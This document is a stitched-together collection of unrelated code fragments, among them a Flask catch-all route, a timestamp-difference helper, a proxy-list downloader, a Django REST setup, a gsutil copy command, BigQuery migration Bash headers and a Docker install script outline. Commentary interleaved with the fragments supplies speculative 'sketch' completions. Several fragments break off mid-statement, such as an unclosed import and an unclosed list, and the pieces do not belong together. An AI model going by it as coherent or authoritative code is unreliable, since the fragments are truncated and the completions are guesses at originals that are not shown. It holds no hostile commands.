import socket
from flask import Flask, request
import sys
from threading import Thread
from time import sleep

app = Flask(__name__)

HTTP_METHODS = ['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'CONNECT', 'OPTIONS', 'TRACE', 'PATCH']
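The HTTP_METHODS list suggests the app registers a catch-all route for every HTTP verb. A minimal sketch of that pattern, assuming the snippet continues along these lines (the handler body and port are illustrative, not from the original):

@app.route('/', defaults={'path': ''}, methods=HTTP_METHODS)
@app.route('/<path:path>', methods=HTTP_METHODS)
def catch_all(path):
    # Echo the method and path for any request on any verb (illustrative handler).
    return f'{request.method} /{path}\n'

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8080)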
import datetime
from time import sleep, time
from dateutil.relativedelta import relativedelta
from collections import OrderedDict

def calculate_diff(dt2, dt1):
    # Both arguments are Unix timestamps; convert them to datetimes and return
    # the calendar-aware difference (the relativedelta import above suggests
    # this is the intended return value -- the original cuts off here).
    dt1 = datetime.datetime.fromtimestamp(dt1)
    dt2 = datetime.datetime.fromtimestamp(dt2)
    return relativedelta(dt2, dt1)
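A quick usage sketch, assuming the completion above:

now = time()
earlier = now - 90 * 24 * 3600  # roughly three months ago
diff = calculate_diff(now, earlier)
print(diff.years, diff.months, diff.days)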
import os
from random import choice
import argparse
from tqdm import tqdm
import base64
import re
import requests

FILE_NAME = 'proxies_downloaded.txt'
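The imports (requests, re, tqdm) and the output filename point to a script that fetches proxy lists and saves them. A minimal sketch of that flow, assuming these imports; PROXY_SOURCE_URL is a hypothetical placeholder, not from the original script:

# Hypothetical source URL -- the original script's sources are not shown.
PROXY_SOURCE_URL = 'https://example.com/proxies.txt'

def download_proxies(url=PROXY_SOURCE_URL):
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Keep only lines that look like ip:port pairs.
    proxies = re.findall(r'\d{1,3}(?:\.\d{1,3}){3}:\d+', response.text)
    with open(FILE_NAME, 'w') as fh:
        fh.write('\n'.join(proxies))
    return proxies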
import os

os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'minimaldjango.settings')

from django.forms import DateField
from rest_framework import routers
from rest_framework.serializers import ModelSerializer
from rest_framework.viewsets import ModelViewSet
from django.db.models import (
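The final import is cut off in the source, so the exact model fields are unknown. A minimal sketch of how these Django REST Framework pieces typically wire together, using a hypothetical Event model; in a real project the model, serializer, and viewset would live in an app's own modules:

from django.db import models

class Event(models.Model):  # hypothetical model, not from the original
    name = models.CharField(max_length=100)
    date = models.DateField()

class EventSerializer(ModelSerializer):
    class Meta:
        model = Event
        fields = ['id', 'name', 'date']

class EventViewSet(ModelViewSet):
    queryset = Event.objects.all()
    serializer_class = EventSerializer

router = routers.DefaultRouter()
router.register(r'events', EventViewSet)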
The following is a single gsutil invocation (split across lines with backslash continuations); gsutil is the command-line tool for interacting with Google Cloud Storage. It performs a high-throughput copy (cp) from one Cloud Storage location (gs://source) to another (gs://destination). The -o flags override boto/GSUtil configuration for this one run, tuning the parallel composite upload threshold, thread count, hash checking, and sliced downloads, while -h attaches a Content-Encoding:gzip header to the uploaded objects.
gsutil -o "GSUtil:parallel_composite_upload_threshold=150M" \
       -o "GSUtil:parallel_thread_count=10" \
       -o "GSUtil:check_hashes=if_fast_else_skip" \
       -h "Content-Encoding:gzip" \
       -o "GSUtil:sliced_object_download=true" \
       cp gs://source gs://destination
#!/bin/bash

if [[ "$*" == *-v* ]]; then
    set -x
fi

source_project_id="${SOURCE_PROJECT_ID}"
destination_project_id="${DESTINATION_PROJECT_ID}"
dataset_name="${DATASET_NAME}"
#!/bin/bash
# Purpose: This Bash script automates data migration between BigQuery and Google Cloud Storage.
# It streamlines the process by using Google Cloud Storage as temporary staging. It exports table
# schemas to JSON, loads data from CSV files into BigQuery for analysis, and moves data between
# storage buckets. It also simplifies bucket management for organized data and added redundancy.
# Value: For GCP users, this script simplifies and expedites data migration tasks between
# BigQuery projects, making it a useful resource for routine data management.
# How to Run: Before executing, set the key variables `SOURCE_PROJECT_ID`, `DESTINATION_PROJECT_ID`,
# and `DATASET_NAME`. Then prepare an input file listing the table names to process, and run the
# script in a Bash shell.
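A sketch of what the per-table loop might look like, using the standard bq and gsutil commands the header describes; the staging bucket name and file layout are assumptions, not taken from the original script:

# Hypothetical staging bucket; the original script's bucket naming is not shown.
staging_bucket="gs://${destination_project_id}-bq-staging"

while read -r table_name; do
    # Export the table schema to JSON.
    bq show --schema --format=prettyjson \
        "${source_project_id}:${dataset_name}.${table_name}" > "${table_name}_schema.json"

    # Extract the table to CSV in the staging bucket.
    bq extract --destination_format=CSV \
        "${source_project_id}:${dataset_name}.${table_name}" \
        "${staging_bucket}/${table_name}.csv"

    # Load the CSV into the destination project using the exported schema.
    bq load --source_format=CSV --skip_leading_rows=1 \
        "${destination_project_id}:${dataset_name}.${table_name}" \
        "${staging_bucket}/${table_name}.csv" "${table_name}_schema.json"
done < "$1"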
from datetime import datetime
import pandas as pd
import requests

pd.set_option('display.max_columns', 8)
pd.set_option('display.max_seq_items', None)
pd.set_option('display.width', 200)

zones = [
    'US East (N. Virginia)',
##############################################################################
# Docker Installation Script for Ubuntu                                      #
#                                                                            #
# Automates the installation of Docker on Ubuntu systems. Checks if Docker   #
# is already installed; if not, it proceeds with the installation steps.     #
#                                                                            #
# This script simplifies Docker installation on Ubuntu by updating package   #
# lists, installing necessary dependencies like ca-certificates, curl, and   #
# gnupg, setting up the Docker repository, and installing Docker CE, the     #
# Docker CLI, containerd.io, docker-buildx-plugin, and docker-compose-plugin.#
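The script body is not shown here; a sketch of the flow the header describes, following Docker's documented apt-based installation procedure for Ubuntu, so the original's details may differ:

#!/bin/bash
# Skip installation if Docker is already present.
if command -v docker >/dev/null 2>&1; then
    echo "Docker is already installed."
    exit 0
fi

# Update package lists and install prerequisites.
sudo apt-get update
sudo apt-get install -y ca-certificates curl gnupg

# Add Docker's official GPG key and apt repository.
sudo install -m 0755 -d /etc/apt/keyrings
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | \
    sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg

echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] \
https://download.docker.com/linux/ubuntu $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | \
    sudo tee /etc/apt/sources.list.d/docker.list > /dev/null

# Install Docker CE, the CLI, containerd, and the buildx/compose plugins.
sudo apt-get update
sudo apt-get install -y docker-ce docker-ce-cli containerd.io \
    docker-buildx-plugin docker-compose-plugin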